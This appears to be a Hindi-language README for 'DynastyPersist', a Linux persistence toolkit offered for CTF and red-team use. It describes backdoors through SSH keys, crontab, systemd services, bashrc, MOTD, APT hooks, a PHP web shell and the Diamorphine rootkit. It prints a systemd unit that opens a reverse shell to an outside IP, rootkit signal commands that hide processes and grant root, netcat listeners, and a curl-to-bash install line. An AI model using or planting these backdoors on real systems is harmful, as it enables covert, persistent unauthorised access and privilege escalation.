
SSH कुंजी बैकडोर, क्रॉनजॉब्स, सिस्टमडी सेवाओं, LKM रूटकिट्स और LD_PRELOAD विशेषाधिकार वृद्धि के लिए 11 मॉड्यूल्स के साथ लिनक्स पर्सिस्टेंस टूलकिट। CTF प्रतियोगिताओं और रेड टीम संचालन के लिए डिज़ाइन किया गया।

| सुविधाएँ | विवरण |
|---|---|
| SSH कुंजी निर्माण | गुप्त पहुंच के लिए स्वचालित रूप से SSH कुंजियाँ उत्पन्न करता है। |
| क्रॉनजॉब स्थायित्व | निर्धारित स्थायित्व के लिए क्रॉनजॉब सेट करता है। |
| रूट के साथ कस्टम उपयोगकर्ता | रूट विशेषाधिकारों वाला एक कस्टम उपयोगकर्ता बनाता है। |
| RCE स्थायित्व | रिमोट कोड निष्पादन के माध्यम से स्थायित्व प्राप्त करता है |
| LKM/रूटकिट | लिनक्स कर्नेल मॉड्यूल (LKM) आधारित रूटकिट स्थायित्व प्रदर्शित करता है। |
| Bashrc स्थायित्व | स्थायित्व के लिए उपयोगकर्ता-विशिष्ट शेल इनिशियलाइज़ेशन फ़ाइलों को संशोधित करता है (उपनाम / रिवर्स शेल)। |
| रूट के लिए Systemd सेवा | रूट स्थायित्व प्राप्त करने के लिए systemd सेवा सेट करता है। |
| LD_PRELOAD विशेषाधिकार वृद्धि कॉन्फ़िग | विशेषाधिकार वृद्धि के लिए LD_PRELOAD कॉन्फ़िगर करता है। |
| दिन का संदेश / हेडर बैकडोर करना | गुप्त पहुंच के लिए सिस्टम संदेश प्रदर्शन को बैकडोर करता है। |
| मौजूदा Systemd सेवा को संशोधित करना | स्थायित्व के लिए किसी मौजूदा systemd सेवा में हेरफेर करता है। |
| APT कमांड को बैकडोर करना | apt कमांड को बैकडोर करता है ताकि एक शेल पॉप अप हो। |
ssh कुंजी निर्माण का उपयोग करके सर्वर तक पहुंच प्राप्त करें। यह मॉड्यूल प्रत्येक उपयोगकर्ता के लिए एक id_rsa कुंजी बनाता है। जिसका उपयोग रिवर्स पहुंच के लिए किया जा सकता है। इस मॉड्यूल को चलाने के बाद, हमलावर ssh के माध्यम से सर्वर से कनेक्ट कर सकता है।
इसे मैन्युअल रूप से ssh-keygen कमांड का उपयोग करके किया जा सकता है। हालांकि, यह मॉड्यूल तुरंत प्रत्येक उपयोगकर्ता के लिए एक निजी कुंजी बनाता है।
root@kali ~ ssh -i id_rsa [email protected]
1लिनक्स में क्रॉनजॉब निर्धारित कार्य होते हैं जो निर्दिष्ट अंतराल पर स्वचालित रूप से चलते हैं।
सबसे कुशल मॉड्यूलों में से एक, जिसमें रिवर्स शेल शामिल हैं। यह मॉड्यूल सीधे रिवर्स शेल कमांड को /etc/crontab में लिखता है। जो आपके सुनने वाले पोर्ट पर एक शेल पॉप अप करेगा।
root@kali ~ nc -nvlp 9999
2ssh के माध्यम से उपयोगकर्ता में लॉगिन कर सकता है।root@kali ~ ssh [email protected]
3यह मॉड्यूल एक php स्क्रिप्ट के साथ आता है जो वेब रूट डायरेक्ट्री में होस्ट की जाती है। स्क्रिप्ट /var/www/html/dynasty_rce/rce.php पर स्थित है। इसके अलावा, यदि LKM मॉड्यूल पहले चलाया जाता है तो उपसर्ग dynasty_rce को छिपाया जा सकता है।
victim_ip:port/dynasty_rce/rce.php पर जाने से आपको शेल के भीतर कमांड चलाने की शक्ति मिलेगी।
मॉड्यूल संख्या: 4
LKM रूटकिट पर केंद्रित है जिसे Diamorphine कहा जाता है। मॉड्यूल अस्थायी स्थान के रूप में /var/tmp/.memory में है। मॉड्यूल सेट अप होने के बाद यह निर्देशिका हटा दी जाती है।victim@ubuntu ~ kill -64 0 # Promtes to root user.
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output
5find या cat का उपयोग करता है तो एक शेल प्राप्त होता है।root@kali ~ nc -nvlp 9999
6रिवर्स पहुंच के लिए systemd में एक कस्टम सेवा बनाने वाला मॉड्यूल।
एक उदाहरण:
Description=Dynasty Persist
[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30
[Install]
WantedBy=default.target"
उपरोक्त उदाहरण, एक सेवा के रूप में बनाया जाएगा। यह विधि कुशल और टिकाऊ है।
मॉड्यूल संख्या: 7
LD_PRELOAD लिनक्स में एक पर्यावरण चर है जो उपयोगकर्ताओं को अन्य लाइब्रेरीज़ से पहले एक साझा लाइब्रेरी प्रीलोड करने की अनुमति देता है। LD_PRELOAD का उपयोग करके विशेषाधिकार वृद्धि में एक दुर्भावनापूर्ण लाइब्रेरी लोड करके सिस्टम कॉल को इंटरसेप्ट और संशोधित करना शामिल है, जिससे संभावित रूप से उन्नत विशेषाधिकार प्राप्त होते हैं। यह मॉड्यूल find और wget जैसे कमांड को बैकडोर करता है।
मॉड्यूल संख्या: 8
लिनक्स में "दिन का संदेश" (MOTD) एक अनुकूलन योग्य पाठ है जो उपयोगकर्ताओं को लॉगिन पर प्रदर्शित होता है, जो सिस्टम के बारे में जानकारी या अपडेट प्रदान करता है। यह आमतौर पर /etc/motd फ़ाइल में संग्रहीत होता है और सिस्टम प्रशासकों द्वारा संशोधित किया जा सकता है।
यह मॉड्यूल, /etc/update-motd.d/00-header में एक शेल लिखता है। यह आमतौर पर तब ट्रिगर होता है जब कोई उपयोगकर्ता लॉगिन करता है।
मॉड्यूल संख्या: 9
मॉड्यूल 7 के समान, यह रिवर्स पहुंच के लिए एक मौजूदा सेवा को संशोधित करता है।
बस, यह सेवा में ExecStartPre को एक रिवर्स शेल कमांड से पुनर्लिखित करता है।
मॉड्यूल संख्या: 10
"APT" एडवांस्ड पैकेज टूल के लिए खड़ा है, और इसका उपयोग आमतौर पर उबंटू जैसे डेबियन-आधारित सिस्टम में किया जाता है। फ़ाइल यहाँ होगी: /etc/apt/apt.conf.d/42backdoor
apt कमांड को बैकडोर करता है, जब भी apt चलाया जाता है तो एक शेल पॉप अप होगा।
मॉड्यूल संख्या: 11
वर्तमान में, नवीनतम अपडेट (1.4) में 2 मोड उपलब्ध हैं।
मोड console और ctf हैं जो एक विशिष्ट व्यवहार में काम करने के लिए डिज़ाइन किए गए हैं।
तुलना में, console मोड ctf मोड की तुलना में अधिक सुविधाओं और स्थिरता के साथ आता है।
console मोड टूल को सामान्य सेटअप में प्रवेश कराता है, जिसमें सभी सुविधाएँ शामिल हैं। ये सुविधाएँ स्थानीय होस्ट पर चलेंगी जहाँ स्क्रिप्ट निष्पादित की जा रही है। वास्तविक समय के संचालन में स्थायित्व के लिए डिज़ाइन किया गया है।
किसी चयनित मॉड्यूल को चलाने के लिए use के बाद मॉड्यूल संख्या का उपयोग किया जाएगा। जैसे, use 1
साथ ही, इंटरफ़ेस अपडेट किया गया है, मॉड्यूल/पेलोड अब दिखाई देते हैं जब आप show payloads टाइप करते हैं।
अंत में, सहायता/विकल्प मेनू भी संशोधित किया गया है, इसे देखने के लिए show options दर्ज करें।
ctf मोड एक अतिरिक्त सुविधा है जो एक समझौता किए गए सर्वर में SSH के माध्यम से लॉगिन करने और स्थायित्व प्राप्त करने के लिए है। यह ऐड-ऑन KoTH या Battlegrounds में बहुत मदद करेगा। इसके अलावा, यह स्थायित्व सेट अप करने में लगने वाले समय को बहुत बचाएगा।
console में अधिकांश फ़ंक्शन चलाता है।
$ ./dynasty.sh <lhost> <lport> <mode>
$ ./dynasty.sh ctf
$ ./dynasty.sh 10.10.14.3 9999 console
Git के माध्यम से
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src
Curl के माध्यम से
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash